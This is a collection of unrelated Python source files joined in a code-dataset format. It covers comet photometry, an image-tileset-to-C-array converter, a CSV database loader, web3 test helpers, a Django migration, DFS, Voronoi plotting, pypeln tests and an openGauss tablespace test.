Reverse of Efrho.from_mag test
>>> import astropy.units as u
>>> from synphot import SpectralElement
>>> from sbpy.activity import Efrho
>>> bp = SpectralElement.from_file('https://irsa.ipac.caltech.edu/'
... 'data/SPITZER/docs/files/spitzer/redPUtrans.txt', wave_unit='um',
... comment=';') # doctest: +REMOTE_DATA +IGNORE_OUTPUT
>>> efrho = Efrho(3423.67, u.cm)
>>> aper = 10000 * u.km
>>> eph = {'rh': 1.45 * u.au,
... 'delta': 0.49 * u.au}
>>> efrho.mag('vegamag', aper, eph, bandpass=bp)
... # doctest: +REMOTE_DATA +IGNORE_OUTPUT
10.0 # doctest: +REMOTE_DATA +FLOAT_CMP
Notes
-----
See :ref:`sbpy_spectral_standards` for calibration notes.
Filter names can be found in the `synphot` `documentation
<http://synphot.readthedocs.io/en/stable/synphot/bandpass.html#synphot-predefined-filter>`_.
A discussion of magnitude zero points can be found in the
`synphot` `documentation
<http://synphot.readthedocs.io/en/latest/synphot/units.html#counts-and-magnitudes>`_.
"""
if fluxd0 is None and bandpass is None:
raise ValueError('One of `bandpass` or `fluxd0` must be provided.')
efrho0 = Efrho.from_mag(0, unit, aper, eph, bandpass=bandpass,
fluxd0=fluxd0, Tscale=Tscale, **kwargs)
return -2.5 * np.log10(self.cm / efrho0.cm)
class Syndynes:
    """Syndynes and Synchrones.

    Placeholder for dust syndyne/synchrone computations; instantiation
    currently fails because the class is not yet implemented.

    Parameters
    ----------
    orb :
        Orbit of the comet (TBD).
    date :
        Observation date (TBD).
    """

    def __init__(self, orb, date):
        self.orb = orb
        self.date = date
        # BUG FIX: `raise NotImplemented` raised a TypeError because
        # NotImplemented is a comparison sentinel, not an exception class;
        # the proper exception type is NotImplementedError.
        raise NotImplementedError

    def plot_syndynes(self, betas, ages, location='500'):
        """
        Plot syndynes for an observer.
        Parameters
        ----------
        betas: array, mandatory
            beta values
        ages: array, mandatory
            synchrone ages
        location: str, optional, default: '500' (geocentric)
            observer location MPC code
        Returns
        -------
        ax: `~matplotlib.pyplot.Axes`
        Examples
        --------
        TBD
        not yet implemented
        """
        pass
| StarcoderdataPython |
5095926 | <filename>main.py
from PIL import Image
from enum import Enum
import argparse
# Index positions of width (X) and height (Y) inside a tile-size tuple.
TileSizeIndex = Enum("TileSizeIndex", [("X", 0), ("Y", 1)])
# Channel order of a pixel tuple from a PIL image converted to "RGBA".
ColorChannelIndexForPIL = Enum(
    "ColorChannelIndexForPIL",
    [("RED", 0), ("GREEN", 1), ("BLUE", 2), ("ALPHA", 3)],
)
# Bit offsets used when packing pixels: the ARGB8888_*/RGB565_* members are
# shift amounts into the target word; RED5/GREEN6/BLUE5 are the right-shifts
# that reduce 8-bit channels to 5/6/5 bits.  (Duplicate values create enum
# aliases, exactly as in the original class form.)
ColorChannelBitOffset = Enum(
    "ColorChannelBitOffset",
    [
        ("ARGB8888_ALPHA", 24),
        ("ARGB8888_RED", 16),
        ("ARGB8888_GREEN", 8),
        ("ARGB8888_BLUE", 0),
        ("RGB565_RED", 11),
        ("RGB565_GREEN", 5),
        ("RGB565_BLUE", 0),
        ("RED5", 3),
        ("GREEN6", 2),
        ("BLUE5", 3),
    ],
)
# Index positions inside a (start, end, step) scan-limit tuple.
ScanLimitsInfoIndex = Enum(
    "ScanLimitsInfoIndex",
    [("START", 0), ("END", 1), ("STEP", 2)],
)
def main():
    """Entry point: parse CLI args, slice the input image into tiles and
    write them out as a C 3-D array literal."""
    args = parse_args()
    # BUG FIX: the else-branch previously assigned `outputFilename`
    # (lower-case "n") while the open() below reads `outputFileName`,
    # so any user-supplied -o/--output raised a NameError.
    if args.output is None:
        outputFileName = "tilesToCArray.txt"
    else:
        outputFileName = args.output
    if args.scan_direction is None:
        scanDirection = "LEFT_RIGHT_TOP_BOTTOM"
    else:
        scanDirection = args.scan_direction
    if args.array_name is None:
        arrayName = "tileset"
    else:
        arrayName = args.array_name
    sizeOfATile = (args.x_size, args.y_size)
    # Convert to RGBA so every pixel tuple carries all four channels.
    image = Image.open(args.input).convert("RGBA")
    imagePixels = image.load()
    check_image_size_divisibility(image.width, image.height, args.x_size, args.y_size)
    numberOfTilesInARow = image.width // sizeOfATile[TileSizeIndex.X.value]
    numberOfTilesInAColumn = image.height // sizeOfATile[TileSizeIndex.Y.value]
    tiles, totalNumberOfTiles = get_tile_pixel_values_and_total_number_of_tiles(numberOfTilesInARow, numberOfTilesInAColumn, sizeOfATile, imagePixels, scanDirection)
    print("The number of tiles in a row is {0}".format(numberOfTilesInARow))
    print("The number of tiles in a column is {0}".format(numberOfTilesInAColumn))
    print("The total number of tiles is {0}".format(totalNumberOfTiles))
    tiles = convert_tiles_to_color_format(tiles, totalNumberOfTiles, args.color_format)
    outputString = convert_tiles_to_C_3d_array(totalNumberOfTiles, tiles, sizeOfATile, arrayName, args.color_format)
    with open(outputFileName, "w") as outputFile:
        outputFile.write(outputString)
def convert_tiles_to_C_3d_array(totalNumberOfTiles, tiles, sizeOfATile, arrayName, colorFormat):
    """Render the per-tile pixel words as C source text.

    The output is a `const` 3-D array declaration, one brace-group per
    tile and one row of zero-padded hex literals per tile scanline.
    (Removed the unused local `currentArrayIndex` from the original.)
    """
    outputString = ""
    indentation = " " * 4
    currentTileIteration = 0
    # Element type and hex digit count follow the colour depth.
    # colorFormat is validated by argparse choices; any other value would
    # raise UnboundLocalError at the declaration below.
    if colorFormat == "RGB565":
        dataType = "uint16_t"
        hexStringLength = 4
    elif colorFormat == "RGB888" or colorFormat == "ARGB8888":
        dataType = "uint32_t"
        hexStringLength = 8
    arrayDeclarationString = "const {0} {1} [{2}][{3}][{4}] = {{".format(dataType, arrayName, totalNumberOfTiles, sizeOfATile[TileSizeIndex.Y.value], sizeOfATile[TileSizeIndex.X.value])
    lengthOfArrayDeclarationString = len(arrayDeclarationString)
    outputString += arrayDeclarationString
    for tile in tiles:
        outputString += "\n"
        # Opening brace of this tile, aligned past the declaration text.
        secondNestIndentation = (lengthOfArrayDeclarationString * ' ') + indentation + "{"
        lengthOfFirstNestIndentation = len(secondNestIndentation)
        outputString += secondNestIndentation
        for i in range(0, sizeOfATile[TileSizeIndex.Y.value]):
            outputString += "\n"
            outputString += (lengthOfFirstNestIndentation * ' ')
            outputString += indentation
            outputString += "{"
            for j in range(0, sizeOfATile[TileSizeIndex.X.value]):
                # Tiles are stored flat; index = row * width + column.
                outputString += "0x{0:0{1}x}".format(tile[(i * sizeOfATile[TileSizeIndex.X.value]) + j], hexStringLength)
                if j == (sizeOfATile[TileSizeIndex.X.value] - 1):
                    outputString += ""
                else:
                    outputString += ", "
            outputString += "}"
            if i == (sizeOfATile[TileSizeIndex.Y.value] - 1):
                outputString += ""
            else:
                outputString += ", "
        outputString += "\n"
        outputString += (lengthOfArrayDeclarationString * ' ')
        outputString += indentation
        outputString += "}"
        currentTileIteration = currentTileIteration + 1
        if currentTileIteration == len(tiles):
            outputString += ""
        else:
            outputString += ", "
    outputString += "\n"
    outputString += "};\n"
    return outputString
def convert_tiles_to_color_format(tiles, totalNumberOfTiles, colorFormat):
    """Convert the raw RGBA tiles into packed words for *colorFormat*."""
    converters = {
        "RGB565": convert_tiles_list_to_rgb565_list,
        "RGB888": convert_tiles_list_to_rgb888_list,
        "ARGB8888": convert_tiles_list_to_argb8888_list,
    }
    converter = converters.get(colorFormat)
    if converter is None:
        # Unknown format: same fallback as before, one empty list per tile.
        return [[] for _ in range(totalNumberOfTiles)]
    return converter(tiles, totalNumberOfTiles)
def convert_tiles_list_to_rgb565_list(tiles, totalNumberOfTiles):
    """Pack each RGBA pixel into a 16-bit RGB565 word, tile by tile."""
    packed = [[] for _ in range(totalNumberOfTiles)]
    for index, tile in enumerate(tiles):
        for pixel in tile:
            # Reduce 8-bit channels to 5/6/5 bits, then place them.
            red = pixel[ColorChannelIndexForPIL.RED.value] >> ColorChannelBitOffset.RED5.value
            green = pixel[ColorChannelIndexForPIL.GREEN.value] >> ColorChannelBitOffset.GREEN6.value
            blue = pixel[ColorChannelIndexForPIL.BLUE.value] >> ColorChannelBitOffset.BLUE5.value
            packed[index].append(
                (red << ColorChannelBitOffset.RGB565_RED.value)
                | (green << ColorChannelBitOffset.RGB565_GREEN.value)
                | (blue << ColorChannelBitOffset.RGB565_BLUE.value)
            )
    return packed
def convert_tiles_list_to_rgb888_list(tiles, totalNumberOfTiles):
    """Pack each pixel's R, G, B channels into a 24-bit word (alpha dropped)."""
    packed = [[] for _ in range(totalNumberOfTiles)]
    for index, tile in enumerate(tiles):
        for pixel in tile:
            word = pixel[ColorChannelIndexForPIL.RED.value] << ColorChannelBitOffset.ARGB8888_RED.value
            word |= pixel[ColorChannelIndexForPIL.GREEN.value] << ColorChannelBitOffset.ARGB8888_GREEN.value
            word |= pixel[ColorChannelIndexForPIL.BLUE.value] << ColorChannelBitOffset.ARGB8888_BLUE.value
            packed[index].append(word)
    return packed
def convert_tiles_list_to_argb8888_list(tiles, totalNumberOfTiles):
    """Pack each pixel's A, R, G, B channels into a 32-bit ARGB word."""
    packed = [[] for _ in range(totalNumberOfTiles)]
    for index, tile in enumerate(tiles):
        for pixel in tile:
            word = pixel[ColorChannelIndexForPIL.ALPHA.value] << ColorChannelBitOffset.ARGB8888_ALPHA.value
            word |= pixel[ColorChannelIndexForPIL.RED.value] << ColorChannelBitOffset.ARGB8888_RED.value
            word |= pixel[ColorChannelIndexForPIL.GREEN.value] << ColorChannelBitOffset.ARGB8888_GREEN.value
            word |= pixel[ColorChannelIndexForPIL.BLUE.value] << ColorChannelBitOffset.ARGB8888_BLUE.value
            packed[index].append(word)
    return packed
def parse_args():
    """Parse the command line.

    Required: input image, tile width/height, colour format.
    Optional: output file name, scan direction, C array name.
    Argument order is preserved because it determines --help output.
    """
    parser = argparse.ArgumentParser(description="Convert a tileset image to C arrays")
    parser.add_argument("-i", "--input", metavar="", required=True, help="The image to be converted")
    parser.add_argument("-x", "--x-size", metavar="", required=True, type=int, help="The width of a single tile")
    parser.add_argument("-y", "--y-size", metavar="", required=True, type=int, help="The height of a single tile")
    parser.add_argument("-c", "--color-format", metavar="", required=True, choices=["RGB565", "RGB888", "ARGB8888"], help="The color format")
    parser.add_argument("-o", "--output", metavar="", help="The name of the output file")
    parser.add_argument("-s", "--scan-direction", metavar="", choices=["LEFT_RIGHT_TOP_BOTTOM", "RIGHT_LEFT_TOP_BOTTOM", "LEFT_RIGHT_BOTTOM_TOP", "RIGHT_LEFT_BOTTOM_TOP"], help="The scan direction for the image input")
    parser.add_argument("-a", "--array-name", metavar="", help="The name of the C array")
    args = parser.parse_args()
    return args
def get_tile_pixel_values_and_total_number_of_tiles(numberOfTilesInARow, numberOfTilesInAColumn, sizeOfATile, imagePixels, scanDirection):
    """Build the (start, end, step) scan limits for *scanDirection* and
    collect every tile's pixel tuples.

    y1/x1 limits step from tile to tile; y2/x2 limits step across the
    pixels inside one tile.  Returns ``(tiles, totalNumberOfTiles)``.
    """
    totalNumberOfTiles = numberOfTilesInARow * numberOfTilesInAColumn
    if scanDirection == "LEFT_RIGHT_TOP_BOTTOM":
        y1ScanLimits = 0, sizeOfATile[TileSizeIndex.Y.value] * numberOfTilesInAColumn, sizeOfATile[TileSizeIndex.Y.value]
        y2ScanLimits = 0, sizeOfATile[TileSizeIndex.Y.value], 1
        x1ScanLimits = 0, sizeOfATile[TileSizeIndex.X.value] * numberOfTilesInARow, sizeOfATile[TileSizeIndex.X.value]
        x2ScanLimits = 0, sizeOfATile[TileSizeIndex.X.value], 1
    elif scanDirection == "RIGHT_LEFT_TOP_BOTTOM":
        y1ScanLimits = 0, sizeOfATile[TileSizeIndex.Y.value] * numberOfTilesInAColumn, sizeOfATile[TileSizeIndex.Y.value]
        y2ScanLimits = 0, sizeOfATile[TileSizeIndex.Y.value], 1
        x1ScanLimits = (sizeOfATile[TileSizeIndex.X.value] * numberOfTilesInARow) - 1, -1, -(sizeOfATile[TileSizeIndex.X.value])
        x2ScanLimits = (sizeOfATile[TileSizeIndex.X.value]) - 1, -1, -1
    elif scanDirection == "LEFT_RIGHT_BOTTOM_TOP":
        y1ScanLimits = (sizeOfATile[TileSizeIndex.Y.value] * numberOfTilesInAColumn) - 1, -1, -(sizeOfATile[TileSizeIndex.Y.value])
        y2ScanLimits = (sizeOfATile[TileSizeIndex.Y.value]) - 1, -1, -1
        x1ScanLimits = 0, sizeOfATile[TileSizeIndex.X.value] * numberOfTilesInARow, sizeOfATile[TileSizeIndex.X.value]
        x2ScanLimits = 0, sizeOfATile[TileSizeIndex.X.value], 1
    elif scanDirection == "RIGHT_LEFT_BOTTOM_TOP":
        y1ScanLimits = (sizeOfATile[TileSizeIndex.Y.value] * numberOfTilesInAColumn) - 1, -1, -(sizeOfATile[TileSizeIndex.Y.value])
        y2ScanLimits = (sizeOfATile[TileSizeIndex.Y.value]) - 1, -1, -1
        x1ScanLimits = (sizeOfATile[TileSizeIndex.X.value] * numberOfTilesInARow) - 1, -1, -(sizeOfATile[TileSizeIndex.X.value])
        x2ScanLimits = (sizeOfATile[TileSizeIndex.X.value]) - 1, -1, -1
    else:
        # Previously an unrecognized direction fell through to an
        # UnboundLocalError on the limit tuples; fail clearly instead.
        raise ValueError("unknown scan direction: {0}".format(scanDirection))
    tiles = get_tile_pixel_values(numberOfTilesInARow, numberOfTilesInAColumn, totalNumberOfTiles, imagePixels, y1ScanLimits, y2ScanLimits, x1ScanLimits, x2ScanLimits)
    return tiles, totalNumberOfTiles
def get_tile_pixel_values(numberOfTilesInARow, numberOfTilesInAColumn, totalNumberOfTiles, imagePixels, y1ScanLimits, y2ScanLimits, x1ScanLimits, x2ScanLimits):
    """Collect each tile's pixel tuples in scan order.

    The four (start, end, step) limit tuples drive nested range() loops:
    y1/x1 walk tile origins across the image, y2/x2 walk pixels inside a
    tile.  Pixels land in tiles[row * tilesPerRow + column].
    """
    tiles = [[] for i in range(totalNumberOfTiles)]
    indexOfATile = 0
    tileNumberOffset = 0
    currentRow = 0
    currentColumn = 0
    for y1 in range(y1ScanLimits[ScanLimitsInfoIndex.START.value], y1ScanLimits[ScanLimitsInfoIndex.END.value], y1ScanLimits[ScanLimitsInfoIndex.STEP.value]):
        # First tile index of the current tile row.
        tileNumberOffset = currentRow * numberOfTilesInARow
        for y2 in range(y2ScanLimits[ScanLimitsInfoIndex.START.value], y2ScanLimits[ScanLimitsInfoIndex.END.value], y2ScanLimits[ScanLimitsInfoIndex.STEP.value]):
            indexOfATile = 0
            for x1 in range(x1ScanLimits[ScanLimitsInfoIndex.START.value], x1ScanLimits[ScanLimitsInfoIndex.END.value], x1ScanLimits[ScanLimitsInfoIndex.STEP.value]):
                indexOfATile = tileNumberOffset + currentColumn
                for x2 in range(x2ScanLimits[ScanLimitsInfoIndex.START.value], x2ScanLimits[ScanLimitsInfoIndex.END.value], x2ScanLimits[ScanLimitsInfoIndex.STEP.value]):
                    # x1/y1 are the tile origin, x2/y2 the in-tile offset.
                    tiles[indexOfATile].append(imagePixels[x1 + x2, y1 + y2])
                currentColumn = currentColumn + 1
            # One full pixel row of this tile row has been consumed.
            currentColumn = 0
        currentRow = currentRow + 1
    return tiles
def check_image_size_divisibility(imageXSize, imageYSize, tileXSize, tileYSize):
    """Abort with a non-zero status when the image does not divide evenly
    into tiles of the requested size.

    BUG FIX: the original called bare ``exit()``, which terminates with
    status 0 - signalling success to the shell despite the failure.
    """
    if imageXSize % tileXSize != 0:
        print("X size not divisible!")
        raise SystemExit(1)
    if imageYSize % tileYSize != 0:
        print("Y size not divisible!")
        raise SystemExit(1)
# Run the converter only when executed as a script (not on import).
if __name__ == '__main__':
    main()
| StarcoderdataPython |
5002055 | """
Filename: workout_data.py
Purpose: Loads the workout data into the database from a csv file
Authors: <NAME>
Group: Wholesome as Heck Programmers (WaHP)
Last modified: 11/13/21
"""
from db_manager import db_mgr
import csv
# Boolean to delete data from the workouts table
# Useful for debugging and initially setting up
DELETE_DATA = True
# The workout table's column names
data_keys = ['type', 'name', 'equipment', 'difficulty', 'is_priority']
data_to_insert = []
# Load the csv file and convert it into a list of dictionaries so it
# can be inserted into the database
with open("workout_data.csv", newline="") as csv_data:
    # Initialize the spamreader to read from the csv file
    # NOTE(review): quotechar='|' effectively disables the csv module's
    # normal double-quote handling, which is why embedded commas are
    # re-joined by hand below - confirm this matches the file format.
    spamreader = csv.reader(csv_data, delimiter=',', quotechar='|')
    for row in spamreader:
        new_row = {}
        # `count` tracks the current CSV column; the +1 offset skips
        # row[0], presumably an id column - TODO confirm.
        count = 0
        # Make a dictionary for the current row (column name, value)
        for key in data_keys:
            value_data = row[count + 1]
            # Weird case for commas in csv column, need to grab two values
            # NOTE(review): this repairs only a single embedded comma per
            # field; a quoted value containing two commas would still be
            # truncated.
            if '"' in value_data:
                value_data += ',' + row[count + 2]
                value_data = value_data.strip('"')
                count += 1
            # Convert the spreadsheet's TRUE/FALSE strings to booleans.
            if value_data == "TRUE":
                value_data = True
            elif value_data == "FALSE":
                value_data = False
            new_row[key] = value_data
            count += 1
        # Add the dictionary row to the list
        data_to_insert.append(new_row)
        print(f"Converted data from row {len(data_to_insert)}")
# For debugging, deletes all rows from the workouts table
if DELETE_DATA:
    db_mgr.delete_rows('workouts')
# Insert the data into the workouts table
res = db_mgr.add_many_rows('workouts', data_to_insert)
if res:
    print("Inserted data into database successfully!")
217588 | import os
from unittest import TestCase
import pytest
from web3 import Web3
from web3.middleware import geth_poa_middleware
class MockTestCase(TestCase):
    """TestCase base that bridges the pytest-mock ``mocker`` fixture into
    unittest-style tests as ``self.mocker``."""
    @pytest.fixture(autouse=True)
    def __inject_fixtures(self, mocker):
        # autouse=True makes pytest run this for every test method,
        # stashing the fixture on the instance for use in test bodies.
        self.mocker = mocker
def get_mainnet_provider():
    """Return a Web3 provider connected to the Ethereum mainnet."""
    return _get_web3_provider("mainnet")
def _get_web3_provider(net: str):
    """Build an Infura-backed Web3 client for *net*, with POA middleware.

    Reads the project id from the INFURA_PROJECT_ID environment variable.
    """
    endpoint = f"https://{net}.infura.io/v3/{os.getenv('INFURA_PROJECT_ID')}"
    client = Web3(Web3.HTTPProvider(endpoint))
    # The POA middleware handles chains whose block extraData exceeds the
    # default 32-byte limit.
    client.middleware_onion.inject(geth_poa_middleware, layer=0)
    return client
| StarcoderdataPython |
9602011 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-09-03 11:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration (Django 1.11.11, see file header):
    # creates the `focus` and `info` tables.  Keep byte-stable - Django
    # tracks applied migrations by content/name.
    initial = True
    dependencies = [
    ]
    operations = [
        # 'Focus' holds a free-text note about a followed stock.
        migrations.CreateModel(
            name='Focus',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('note_info', models.CharField(default='', max_length=200)),
            ],
            options={
                'verbose_name': '股票',
                'db_table': 'focus',
            },
        ),
        # 'Info' stores one day's quote snapshot for a stock
        # (code, short name, change %, turnover, latest price, prior high).
        migrations.CreateModel(
            name='Info',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('code', models.CharField(max_length=10, verbose_name='股票代码')),
                ('short', models.CharField(max_length=20, verbose_name='股票简称')),
                ('chg', models.CharField(max_length=20, verbose_name='涨跌幅')),
                ('turnover', models.CharField(max_length=255, verbose_name='换手率')),
                ('price', models.FloatField(max_length=20, verbose_name='最新价')),
                ('highs', models.FloatField(max_length=20, verbose_name='前期高点')),
                ('time', models.DateField()),
            ],
            options={
                'verbose_name': '股票',
                'db_table': 'info',
            },
        ),
    ]
| StarcoderdataPython |
8118516 | <gh_stars>100-1000
def DFS(graph, v):
    """Run depth-first search over every component of an adjacency-matrix
    graph with *v* vertices, then print the colour and parent arrays."""
    color = [-1 for _ in range(v)]
    parent = [-1 for _ in range(v)]
    clock = 0
    for vertex in range(v):
        if color[vertex] == -1:
            DFSvisit(graph, v, vertex, color, parent, clock)
    print(color)
    print(parent)
def DFSvisit(graph, v, s, color, parent, time):
    """Recursively visit vertex *s*.

    Colours: -1 = unvisited (white), 0 = in progress (gray),
    1 = finished (black).  A back edge to a gray vertex is a cycle.

    BUG FIXES vs. the original:
    * the recursion condition tested ``color[i] == 0`` instead of ``-1``,
      so the search never descended into unvisited neighbours;
    * the early ``return`` on cycle detection left the vertex gray
      forever, corrupting any later traversal.
    Note: ``time`` is an int and rebinding it here does not propagate to
    the caller; it is kept only for signature compatibility.
    """
    color[s] = 0
    time += 1
    for i in range(0, v):
        if graph[s][i] == 1:
            if color[i] == 0:
                # Back edge to an in-progress vertex -> cycle.
                print("Cycle detected at:", s)
            elif color[i] == -1:
                parent[i] = s
                DFSvisit(graph, v, i, color, parent, time)
    color[s] = 1
    time += 1
def main():
    """Build the sample adjacency matrix and run DFS over it."""
    adjacency = [[0, 1, 1, 0, 0, 0],
                 [1, 0, 0, 1, 0, 0],
                 [0, 0, 1, 0, 0, 0],
                 [0, 0, 1, 1, 0, 0],
                 [0, 0, 0, 0, 0, 0],
                 [0, 0, 0, 0, 0, 1]]
    DFS(adjacency, len(adjacency[0]))
# Execute the demo only when run as a script.
if __name__ == '__main__':
    main()
| StarcoderdataPython |
8085760 | <reponame>juancalheiros/voronoi-diagrams
import numpy as np
import matplotlib.pyplot as plt
from scipy.spatial import Voronoi, voronoi_plot_2d, Delaunay
def display_voronoi(points_x, points_y, COLOR_POINT):
    # Draw the input sites as unconnected circular markers ('o' format
    # string = markers only, no connecting line).
    plt.plot(points_x, points_y,'o', color=COLOR_POINT)
def display_delaunay(points_x, points_y, points_indices, COLOR_POINT):
    # Overlay the Delaunay triangulation as an unfilled triangle mesh;
    # points_indices is the (ntri, 3) simplices array from scipy.
    plt.triplot(points_x, points_y, points_indices, color=COLOR_POINT)
def adjust_limit_axis(min_x, max_x, min_y, max_y):
    # Pad the view slightly beyond the data extent so edge points stay
    # visible after the distant dummy points enlarged the auto-limits.
    # NOTE(review): multiplicative padding assumes positive coordinates;
    # for negative values it shrinks the range instead - TODO confirm.
    plt.xlim((min_x*0.996, max_x*1.001))
    plt.ylim((min_y*0.9997, max_y*1.0005))
def get_valid_region_voronoi(voronoi_regions):
    """Return only the closed regions (scipy marks open ones with a -1
    vertex index)."""
    finite = []
    for region in voronoi_regions:
        if -1 not in region:
            finite.append(region)
    return finite
def colorize_polygon_voronoi(area, voronoi_vertices):
    # Resolve the region's vertex indices to coordinates, then fill the
    # polygon; alpha keeps the mesh drawn later visible through the fill.
    polygon = [voronoi_vertices[i] for i in area]
    plt.fill(*zip(*polygon), alpha=0.6)
def colorize_diagrama_voronoi(voronoi_regions, voronoi_vertices):
    """Fill every finite Voronoi region with a translucent colour."""
    for region in get_valid_region_voronoi(voronoi_regions):
        colorize_polygon_voronoi(region, voronoi_vertices)
def get_max_points(coordinates):
    """Return (max_x, max_y) over all coordinate pairs."""
    xs = [point[0] for point in coordinates]
    ys = [point[1] for point in coordinates]
    return max(xs), max(ys)
def get_min_points(coordinates):
    """Return (min_x, min_y) over all coordinate pairs."""
    xs = [point[0] for point in coordinates]
    ys = [point[1] for point in coordinates]
    return min(xs), min(ys)
def limits_axis(max_x, max_y):
    """Return four distant dummy corner points (at twice the data extent)
    used to close the outer Voronoi regions."""
    width = max_x * 2
    height = max_y * 2
    return [
        [width, height],
        [-width, height],
        [width, -height],
        [-width, -height],
    ]
def diagrams_of_voronoi(coordinates):
    """Plot the Voronoi diagram and Delaunay triangulation of *coordinates*.

    Four distant dummy points are appended before the Voronoi tessellation
    so all regions around the real sites become finite and can be filled.
    """
    COLOR_BLUE = 'blue'
    COLOR_BLACK = 'black'
    max_x, max_y = get_max_points(coordinates)
    min_x, min_y = get_min_points(coordinates)
    limits = limits_axis(max_x, max_y)
    # add 4 distant dummy points
    points = np.append(coordinates, limits, axis=0)
    # Triangulation uses only the real sites; Voronoi uses sites + dummies.
    delaunay = Delaunay(coordinates)
    # compute Voronoi tesselation
    voronoi = Voronoi(points)
    POINTS_X = points[:,0]
    POINTS_Y = points[:,1]
    INDICES_TRIANGULATION_POINTS = delaunay.simplices
    voronoi_plot_2d(voronoi, show_vertices=False)
    colorize_diagrama_voronoi(voronoi.regions, voronoi.vertices)
    # Re-center on the real data so the dummy points stay off-screen.
    adjust_limit_axis(min_x, max_x, min_y, max_y)
    display_delaunay(POINTS_X, POINTS_Y, INDICES_TRIANGULATION_POINTS, COLOR_BLACK)
    display_voronoi(POINTS_X, POINTS_Y, COLOR_BLUE)
    plt.show()
| StarcoderdataPython |
278020 | import sys
import time
import typing as tp
from unittest import TestCase
import hypothesis as hp
from hypothesis import strategies as st
import pypeln as pl
# Cap Hypothesis example generation so each property test stays fast.
MAX_EXAMPLES = 10
# Generic type variable (currently unused in this module).
T = tp.TypeVar("T")
class TestEach(TestCase):
    """Property-based tests for ``pl.task.each``: a side-effect mapper
    whose stage yields no elements when consumed."""
    @hp.given(nums=st.lists(st.integers()))
    @hp.settings(max_examples=MAX_EXAMPLES)
    def test_each(self, nums: tp.List[int]):
        # each() returns a lazy stage; run() must drain it without error.
        nums_pl = pl.task.each(lambda x: x, nums)
        assert nums is not None
        if nums_pl is not None:
            pl.task.run(nums_pl)
    @hp.given(nums=st.lists(st.integers()))
    @hp.settings(max_examples=MAX_EXAMPLES)
    def test_each_list(self, nums: tp.List[int]):
        nums_pl = pl.task.each(lambda x: x, nums)
        assert nums is not None
        if nums_pl is not None:
            # Materializing an each() stage always yields the empty list:
            # it exists for side effects, not for producing values.
            nums_pl = list(nums_pl)
            if nums:
                assert nums_pl != nums
            else:
                assert nums_pl == nums
            assert nums_pl == []
    @hp.given(nums=st.lists(st.integers()))
    @hp.settings(max_examples=MAX_EXAMPLES)
    def test_each_run(self, nums: tp.List[int]):
        # run=True executes eagerly and returns None instead of a stage.
        nums_pl = pl.task.each(lambda x: x, nums, run=True)
        assert nums_pl is None
    @hp.given(nums=st.lists(st.integers()))
    @hp.settings(max_examples=MAX_EXAMPLES)
    @pl.task.utils.run_test_async
    async def test_each_list_2(self, nums: tp.List[int]):
        # Awaiting the stage from an async test drains it the same way.
        nums_pl = pl.task.each(lambda x: x, nums)
        assert nums is not None
        if nums_pl is not None:
            nums_pl = await nums_pl
            if nums:
                assert nums_pl != nums
            else:
                assert nums_pl == nums
            assert nums_pl == []
    @hp.given(nums=st.lists(st.integers()))
    @hp.settings(max_examples=MAX_EXAMPLES)
    @pl.task.utils.run_test_async
    async def test_each_list_3(self, nums: tp.List[int]):
        nums_pl = await pl.task.each(lambda x: x, nums)
        assert nums_pl == []
    @hp.given(nums=st.lists(st.integers()))
    @hp.settings(max_examples=MAX_EXAMPLES)
    @pl.task.utils.run_test_async
    async def test_each_list_4(self, nums: tp.List[int]):
        # Parenthesized await - behaviorally identical to test_each_list_3.
        nums_pl = await (pl.task.each(lambda x: x, nums))
        assert nums_pl == []
| StarcoderdataPython |
5175711 | <filename>openGaussBase/testcase/SQL/DDL/tablespace/Opengauss_Function_DDL_Tablespace_Case0024.py<gh_stars>0
"""
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : 功能测试-表空间
Case Name : 表空间修改-重命名
Description :
1、修改不存在的表空间名为另一已存在表空间名
2、修改不存在的表空间名为另一不存在表空间名
3、修改已存在的表空间名为另一已存在表空间名
4、修改已存在的表空间名为pg_开头的表空间名
5、修改已存在的表空间名为不存在表空间名
Expect :
1、修改不存在的表空间名为另一已存在表空间名,修改失败
2、修改不存在的表空间名为另一不存在表空间名,修改失败
3、修改已存在的表空间名为另一已存在表空间名,修改失败
4、修改已存在的表空间名为pg_开头的表空间名,修改失败
5、修改已存在的表空间名为另一不存在表空间名,修改成功
History :
"""
import os
import unittest
from testcase.utils.CommonSH import CommonSH
from testcase.utils.Constant import Constant
from testcase.utils.Logger import Logger
from yat.test import macro
class Tablespace(unittest.TestCase):
    """ALTER TABLESPACE ... RENAME TO functional test (case 0024).

    Exercises renaming between existing and non-existing tablespaces and
    the reserved ``pg_`` name prefix; see the module docstring for the
    full step/expectation table.
    """

    def setUp(self):
        # Fixtures: logger, primary-node SQL shell helper, expected-message
        # constants, plus the tablespace/user names used by this case.
        self.log = Logger()
        self.log.info(f'-----{os.path.basename(__file__)} start-----')
        self.sh = CommonSH('PrimaryDbUser')
        self.constant = Constant()
        self.tbspc_name1 = 'tsp_tbspc0024_1'
        self.tbspc_location1 = 'tbspc0024_1'
        self.tbspc_name2 = 'tsp_tbspc0024_2'
        self.tbspc_location2 = 'tbspc0024_2'
        # Name that never gets created directly; used as the "does not
        # exist yet" rename target in steps 2 and 5.
        self.tbspc_name3 = 'tsp_tbspc0024_3'
        # Name with the reserved "pg_" prefix; renaming to it must fail.
        self.tbspc_name4 = 'pg_tsp_tbspc0024_4'
        self.pwd = <PASSWORD>
        self.sys_user = 'u_tbspc0024'
        # gsql connection options for the sysadmin user created in step 0.
        self.connect_sys = f'-U {self.sys_user} -W {self.pwd}'
        # Expected server error messages for the negative steps.
        self.err_flag1 = f'ERROR: tablespace "{self.tbspc_name2}"' \
                         f' does not exist'
        self.err_flag2 = f'ERROR: tablespace "{self.tbspc_name2}"' \
                         f' already exists'
